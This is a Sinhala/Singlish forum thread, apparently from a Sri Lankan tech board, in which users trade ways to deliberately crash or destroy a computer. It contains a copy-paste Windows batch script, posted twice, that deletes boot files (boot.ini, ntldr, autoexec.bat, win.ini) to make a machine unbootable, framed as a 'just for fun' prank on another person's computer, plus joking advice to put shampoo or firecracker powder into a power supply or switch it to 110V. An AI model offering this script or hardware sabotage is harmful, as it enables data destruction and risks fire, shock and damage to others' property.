Mage PC eka crash

SunSilk

Well-known member
  • Jan 3, 2016
    3,444
    201
    63
    Cardiff,UK
    පවර් සප්ලයි එකේ දැල ඇතුලට සන්සිල්ක් ශැම්පු ටිකක් දාපන්.
    මැශින් එක ඔන් වෙයි..
    දුමක් එක්ක ඩෝන් ගාවි.

    එහෙම නැත්තම් චීන පටස් එකක් අරන් දිග ඇරපන් .
    දිග ඇරලා පවර් සප්ලයි එකේ දැල ඇතුලෙන් දාපන්.
    ඒ කරලා මැශින් එක ටිකක් හොලවපන් හොදට.
    ඒ කරලා මැශින් එක ඔන් කරපන්.


    පවර් සප්ලයි එකේ 110V සිලෙක්ට් කරල කරන්ට් එක දීපන් :D

    ehema switch ekak na ban man baluwa...:dull::dull:
     

    u_make_me_sick_

    Well-known member
  • Oct 1, 2011
    11,522
    7,320
    113
    May be try this,

    Crash a Computer System
    1. Shut Down a Computer Forever
    Hello this tutorial is just for fun
    sure you can crash your own computer
    so here is the how to Crash a Computer System tutorial
    Open notepad and copy/paste this code:

    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini

    Now Save it as a .bat file.

    This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

    REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!
     

    u_make_me_sick_

    Well-known member
  • Oct 1, 2011
    11,522
    7,320
    113
    පවර් සප්ලයි එකේ දැල ඇතුලට සන්සිල්ක් ශැම්පු ටිකක් දාපන්.
    මැශින් එක ඔන් වෙයි..
    දුමක් එක්ක ඩෝන් ගාවි.

    එහෙම නැත්තම් චීන පටස් එකක් අරන් දිග ඇරපන් .
    දිග ඇරලා පවර් සප්ලයි එකේ දැල ඇතුලෙන් දාපන්.
    ඒ කරලා මැශින් එක ටිකක් හොලවපන් හොදට.
    ඒ කරලා මැශින් එක ඔන් කරපන්.

    Power supply ekata wede dunna kiyala wedak wenne ne, data recover karanna puluwan wena power supply ekak set karala
     

    u_make_me_sick_

    Well-known member
  • Oct 1, 2011
    11,522
    7,320
    113
    පවර් සප්ලයි එකත් එක්කම අනිත් කෑලි ටිකත් යනවා ඔහොම කරාම.

    Comp eka galewwoth wede mattu neda? Shampoo karawechcha suwanda/ganda enna puluwan, anika un burnt shampoo ithuru wela thiyenna puluwan.
     

    akilar25

    Well-known member
  • Feb 2, 2009
    39,230
    4,364
    113
    33
    Mozilla Firefox.
    ehema switch ekak na ban...............:rolleyes:

    මොන පයියක්ද බන් උබ කියන්නේ?
    මොන ස්විච් එකක් ගැනද කියන්නේ?
    මම කොහෙද කිව්වේ ස්විච් එකක් ගැන?
    තෝ කසිප්පු ගහලද,කුඩු ගහලද?
     

    SunSilk

    Well-known member
  • Jan 3, 2016
    3,444
    201
    63
    Cardiff,UK
    මොන පයියක්ද බන් උබ කියන්නේ?
    මොන ස්විච් එකක් ගැනද කියන්නේ?
    මම කොහෙද කිව්වේ ස්විච් එකක් ගැන?
    තෝ කසිප්පු ගහලද,කුඩු ගහලද?

    110V switch eka ban power supply eke :dull:
     

    nadeeraLK

    Banned
    Sep 25, 2015
    2,978
    157
    0
    matath oya wage wedak kara ganna ona una ban.mama kale pc eka off karanakot shut down yanne netiwa kelinma swith eken off kala.masayak 2k yanakota pc ekata badu banis una.den aluth 1ka weda karanne.
     

    u_make_me_sick_

    Well-known member
  • Oct 1, 2011
    11,522
    7,320
    113
    umbe ara mekata quote kerenne ba virus guard eka block kerenawa..eken mokakda sirawatama wnene..bat file eka open kerema wade godada?

    Kiyala thiyana hetiyata umbe windows boot files delete karanawa, but mama test karala ne,

    Anyway, oowa karanne ey? Katha karala wede goda daganna berida? Umba kanna/ bonna dena place ekata kelawanna epa ban.
     

    cybernalin

    Member
    Nov 25, 2009
    3,784
    361
    0
    May be try this,

    Crash a Computer System
    1. Shut Down a Computer Forever
    Hello this tutorial is just for fun
    sure you can crash your own computer
    so here is the how to Crash a Computer System tutorial
    Open notepad and copy/paste this code:

    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini

    Now Save it as a .bat file.

    This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

    REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

    meka weda karanne xp walata mata mathaka hetiyata win7 win 8 win 10 okkoma ntldr boot.ini pavichi karanne ne
     

    shaducool

    Well-known member
  • Feb 8, 2016
    572
    566
    93
    Macho Linux CD ekak dala fully fotmat ekak gahanna wenne ethakota recover karanna ba....OS eka crash karanna nam mona mona hari windos folder eke delete karapan...wena karanna deyak naha boss :(